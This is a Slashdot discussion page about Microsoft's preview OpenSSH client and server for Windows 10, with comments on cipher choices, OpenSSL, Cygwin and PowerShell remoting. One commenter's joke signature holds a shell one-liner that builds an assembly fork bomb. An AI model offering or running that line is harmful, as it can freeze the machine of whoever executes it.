Slashdot Mirror

← Back to Stories (view on slashdot.org)

Microsoft Releases a Preview of OpenSSH Client and Server For Windows 10 (servethehome.com)

Posted by EditorDavid on from the OpenSSH-without-OpenSSL dept.

kriston (Slashdot user #7,886) writes: Microsoft released a preview of the OpenSSH server and client for Windows 10. Go to Settings, Apps & Features, and click "Manage optional features" to install them. The software only supports AES-CTR and chacha20 ciphers and supports a tiny subset of keys and KEXs, but, on the other hand, a decent set of MACs.

It also says that it doesn't use the OpenSSL library. That's the really big news, here. I understand leaving out arcfour/RC4 and IDEA, but why wouldn't MSFT include Blowfish, Twofish, CAST, and 3DES? At least they chose the CTR versions of these ciphers. (Blowfish isn't compromised in any practical way, by the way). I prefer faster and less memory- and CPU-intensive ciphers.

Still, it's a good start. The SSH server is compelling enough to check out especially since I just started using X2GO for remote desktop access which requires an SSH server for its file sharing feature.

7 of 144 comments (clear)

  1. Err... have we not learned? by Anonymous Coward · · Score: 3, Insightful

    After Windows 10 turned out to be one OS-sized piece of spyware, why would any sane person use it for anything?

    Time to kick that shit to the curb.

    Anyways Linux and BSD both have much better SSH support, without the malware coming bundled with win10.

  2. "doesn't use the OpenSSL library." by Chris+Mattern · · Score: 3, Insightful

    Then how is it 'OpenSSH"? If it isn't using the Open code, it's just SSH, right?

    1. Re:"doesn't use the OpenSSL library." by Barefoot+Monkey · · Score: 3, Informative

      OpenSSL and OpenSSH are not really related. Neither is OpenGL, for that matter. They are different projects maintained by different people, and just happen to all have "Open" in their names. It is possible for OpenSSH to use OpenSSL for some cryptographic functions, but not necessary (at least not anymore - once upon a time OpenSSL was a dependency).

      OpenSSH is the OpenBSD project's implementation of an SSH client, server and related utilities. If Microsoft is calling it "OpenSSH" then they must be using a port of OpenBSD's programs instead of creating their own. (In fact, Microsoft promised to port OpenSSH to Windows back in June 2015).

  3. Re:We've already got PuTTY by Antique+Geekmeister · · Score: 4, Informative

    Cygwin provides an SSH server, with current OpenSSH releases and a more powerf bash based local working environment. It does require additional non-Microsoft published binaries, and it has had issues operating with various anti-virus software packages. I admit that I'm very, very curious what shell and what capability for chroot sftp access may be available with the new Microsoft published server.

    Activating that future could be very helpful for people who wish to safely upload, or download, more safely from what is already a publicly exposed Windows server.

  4. Re:We've already got PuTTY by Dr.Dubious+DDQ · · Score: 4, Informative
    "Hopefully the Microsoft OpenSSH server will accept clients other than their's."

    It does - or at least it did last time I tried it.

    This project appears to be the Powershell team doing an honest port of the "Portable OpenSSH" code to native Windows, apparently including legitimate efforts to upstream the port to the main "Portable OpenSSH" project, and it seems (or at least seemed) to be as compatible as one would expect.

    When I last tried it, the only issue I ran into was oddities in the terminal emulation, due to Microsoft's shell environment being "special" (things like backspace/del behaving oddly etc.), but it otherwise seemed to work just the same as OpenSSH on my Linux boxen. It's probably been nearly a year since I tried to seriously play with it, so I imagine a lot of improvements have taken place since then.

    One nice thing about this project is that there seem to be rumors that "Powershell remoting" will eventually use SSH as its authentication and transport mechanism, which is a major hole in the current port of Powershell to non-Windows platforms. (You *can* do "powershell remoting" from e.g. Linux to Windows, but *only* if you substantially downgrade the security on the Windows side to allow it, because apparently it currently depends on one of the many special "Windows-only" features in powershell to do otherwise. Switching to SSH for this would fix that problem.)

    --
    Hacker Public Radio is our Friend
  5. Re:We've already got PuTTY by Hal_Porter · · Score: 4, Funny

    PuTTY does ANSI terminal emulation. So can watch Star Wars by Telnet in color!

    telnet towel.blinkenlights.nl

    If everyone watched movies in the efficient open standard Telnet instead of the bloated and patent encumbered H.264 we'd save 52 Gigatonnes of CO2 per year.

    --
    echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
  6. Already deprecated algorithms by twistedcubic · · Score: 4, Insightful

    ....but why wouldn't MSFT include Blowfish, Twofish, CAST, and 3DES?...

    Slashdot article: New SWEET32 Crypto Attacks Speed Up Deprecation of 3DES, Blowfish

    Bruce Schneier, the creator of Blowfish, long ago suggested people stop using it.